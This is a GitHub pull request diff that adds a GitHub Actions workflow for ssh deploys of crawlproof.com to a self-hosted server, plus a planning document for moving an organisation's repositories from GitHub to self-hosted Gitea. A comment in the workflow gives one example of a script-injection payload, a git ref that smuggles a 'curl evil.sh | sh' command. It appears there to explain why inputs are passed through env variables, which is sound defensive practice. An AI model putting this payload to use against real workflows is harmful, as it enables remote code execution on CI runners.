Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
81 changes: 81 additions & 0 deletions .github/workflows/deploy-dev2.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,81 @@
name: Deploy to dev2

# Replaces Railway's git-push auto-deploy. Railway watched this repo and
# redeployed on every push to main; this does the same thing against dev2.
#
# The build happens ON dev2, not here: the image bakes NEXT_PUBLIC_* in at
# build time and those values live in /home/anthony/www/crawlproof.com/app.env,
# which never leaves the box. CI only needs to be able to ssh in.
#
# Secrets required:
# DEV2_SSH_KEY private key for the deploy account on dev2
# DEV2_HOST dev2.profullstack.com
# DEV2_USER anthony
# DEV2_KNOWN_HOSTS output of `ssh-keyscan dev2.profullstack.com`

on:
push:
# master, not main — this repo's default branch is master, and a workflow
# watching main would simply never fire.
branches: [master]
workflow_dispatch:
inputs:
ref:
description: Git ref to deploy (defaults to the pushed commit)
required: false
type: string

concurrency:
# One deploy at a time; a newer push should wait rather than race a build
# that is already halfway through `next build` on the box.
group: deploy-dev2
cancel-in-progress: false

jobs:
deploy:
runs-on: ubuntu-latest
timeout-minutes: 45
steps:
# Every ${{ }} below goes through env, never straight into the shell.
# `inputs.ref` is attacker-controllable through workflow_dispatch, and
# interpolating it into a `run:` body is script injection: a ref like
# `main"; curl evil.sh | sh; #` would execute on the runner.
- name: Resolve target revision
id: rev
env:
REF: ${{ inputs.ref || github.sha }}
run: echo "sha=$REF" >> "$GITHUB_OUTPUT"

- name: Set up ssh
env:
SSH_KEY: ${{ secrets.DEV2_SSH_KEY }}
KNOWN_HOSTS: ${{ secrets.DEV2_KNOWN_HOSTS }}
run: |
install -d -m 700 ~/.ssh
printf '%s\n' "$SSH_KEY" > ~/.ssh/id_ed25519
chmod 600 ~/.ssh/id_ed25519
printf '%s\n' "$KNOWN_HOSTS" > ~/.ssh/known_hosts
chmod 644 ~/.ssh/known_hosts

- name: Deploy
env:
DEV2_USER: ${{ secrets.DEV2_USER }}
DEV2_HOST: ${{ secrets.DEV2_HOST }}
SHA: ${{ steps.rev.outputs.sha }}
run: |
# The sha is passed as a positional argument rather than being
# spliced into the remote command string, so a hostile ref cannot
# extend the command that runs on dev2 either.
ssh -o BatchMode=yes "$DEV2_USER@$DEV2_HOST" \
/home/anthony/www/crawlproof.com/deploy-app.sh "$SHA"

- name: Verify the site answers over TLS
# deploy-app.sh already health-checks on loopback; this proves nginx and
# the certificate in front of it are serving the new container too.
run: |
for i in $(seq 1 10); do
code=$(curl -s -o /dev/null -w '%{http_code}' https://crawlproof.com/ || true)
if [ "$code" = 200 ]; then echo "crawlproof.com 200"; exit 0; fi
echo "attempt $i: $code"; sleep 10
done
echo "crawlproof.com never returned 200"; exit 1
122 changes: 122 additions & 0 deletions ops/selfhost/PRD-git-profullstack-com.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,122 @@
# PRD: git.profullstack.com, moving the fleet off GitHub to self-hosted Gitea

Status: draft, not scheduled. Written 2026-09-24 alongside the crawlproof.com
move to dev2, because that move is the first time every deploy path in a repo
stopped depending on a vendor.

This is fleet-wide and only lives in the crawlproof repo because that is where
the work that prompted it happened. Move it to cli-tools when it gets picked up.

## Why

The Fleet SysOps Manifesto already says bare metal over managed platforms, God
Mode keys in the vault, and automate everything. Source control is the last
large dependency that is still somebody else's service, and it is the one that
every other system is downstream of: CI, deploys, releases, issue tracking, and
the agent tooling that reads and writes repos all terminate at GitHub.

Concretely, the pull is:

1. **CI minutes and their ceiling.** Jobs killed at their timeout look exactly
like flaky tests, which has already cost real debugging time. Our own
runners on our own boxes have our CPU count and no per-minute meter.
2. **One account is one blast radius.** A suspended org takes every deploy
pipeline in the fleet with it.
3. **Agents are the primary users now.** Most commits and PRs here are opened
by tooling. An API we control can be shaped for that instead of worked
around with rate limit backoff.
4. **It is the same shape of work we just did.** dev2 already runs Docker,
nginx, certbot and a self-hosted Postgres. Gitea is one more compose stack.

## Non-goals for v1

- Replacing GitHub entirely on day one. Public repos stay mirrored to GitHub
for discovery, npm provenance, and anything that links to a github.com URL.
- Migrating GitHub Discussions, Projects, or Sponsors.
- Moving the published npm packages or their release flow.
- Anything about the `malware-test-prs` or CodeQL setups, which are GitHub
security features with no Gitea equivalent.

## Scope

Roughly 150 repositories across `profullstack` and `ralyodio`, of which about
60 are live properties. Per repo we need code, tags, releases, issues, pull
requests, labels, milestones, wikis and webhooks.

The hard part is not the repos. It is the **deploy workflows**: every property
that deploys itself does so from `.github/workflows`, and each one has to keep
working through the move.

## Architecture

- **Host.** Its own box, not dev2. Source control going down must not be
correlated with an app server going down. Same provisioning path as dev2
(`root-ubuntu.sh`, nginx, certbot, Docker).
- **Gitea** in Docker, pinned by tag, behind nginx at `git.profullstack.com`.
- **Postgres** as its database, self-hosted, its own instance rather than
sharing an app's.
- **SSH** on 22 for git, which means the box's own sshd moves to another port
or Gitea's SSH runs on a second address. Decide before provisioning, because
changing it later invalidates every cloned remote.
- **Gitea Actions** with `act_runner`, which speaks the GitHub Actions workflow
syntax. This is the single biggest compatibility question and the thing to
spike first.
- **Object storage** for LFS and attachments, on the local disk to start.
- **Auth** is OAuth 2.1 with PKCE plus passkeys, per house rule. No passwords.
- **Backups** are `gitea dump` plus a Postgres dump, offsite, verified by
restoring into a scratch instance. Unlike an app, there is no upstream copy
to re-derive this from once GitHub is no longer authoritative.

## `tea` CLI

`tea` is Gitea's official CLI and is the intended automation surface: logins,
repos, issues, PRs, releases, and org management. It becomes the house
equivalent of `gh`, which means the fleet's scripts that shell out to `gh`
(`gh-prs`, `gh-issues`, `gh-prs-merge`, `gh-pulse` and friends in `~/scripts`)
need a `tea` path. Wrapping both behind one house command is likely better than
rewriting each script twice.

## Migration mechanics

Gitea's migration API pulls a GitHub repo including issues, PRs, releases,
labels and milestones, given a GitHub token. That is one API call per repo and
is scriptable over the whole list.

Order:

1. Stand up Gitea, restore a backup into a scratch instance to prove backups
work before anything depends on it.
2. Migrate one low-traffic repo end to end, including a deploy.
3. Spike Gitea Actions against the three workflow shapes we actually use:
a plain test matrix, an ssh deploy (like `deploy-dev2.yml`), and a release
that publishes to npm.
4. Bulk-migrate in waves, dormant repos first, live properties last.
5. For each live property, cut its deploy over and watch one real deploy before
moving to the next.
6. Flip GitHub repos to mirrors, or archive them.

## Risks

| Risk | Why it matters | Mitigation |
| --- | --- | --- |
| Gitea Actions is not GitHub Actions | Every deploy in the fleet is a workflow file | Spike it in phase 3 before migrating anything live |
| We become our own uptime | A git outage blocks all shipping | Separate box, tested backups, GitHub mirrors kept warm |
| `gh`-based tooling breaks | Dozens of scripts and agent paths call `gh` | One wrapper over both CLIs, not a rewrite |
| npm provenance | Publishing attestations expect GitHub | Keep releases on GitHub, or drop provenance deliberately |
| SSH port collision | Git on 22 fights the box's own sshd | Decide at provisioning time, never after |
| Half-migrated fleet | Two sources of truth invites drift | Migrate in waves, each wave finished before the next |

## Success criteria

- Every live property deploys from git.profullstack.com with no GitHub involvement.
- A restore from backup into a scratch instance is demonstrated, not assumed.
- `tea` covers what the house scripts need from `gh`.
- Public repos still resolve on github.com as mirrors.
- No deploy outage longer than one deploy cycle for any property during the move.

## Open questions

- One box, or Gitea plus runners on separate boxes?
- Do the `ralyodio` personal repos come along, or stay on GitHub?
- Does CodeQL have a replacement we care about, or do we accept losing it?
- Is issue history worth migrating for dormant repos, or is code and tags enough?
Loading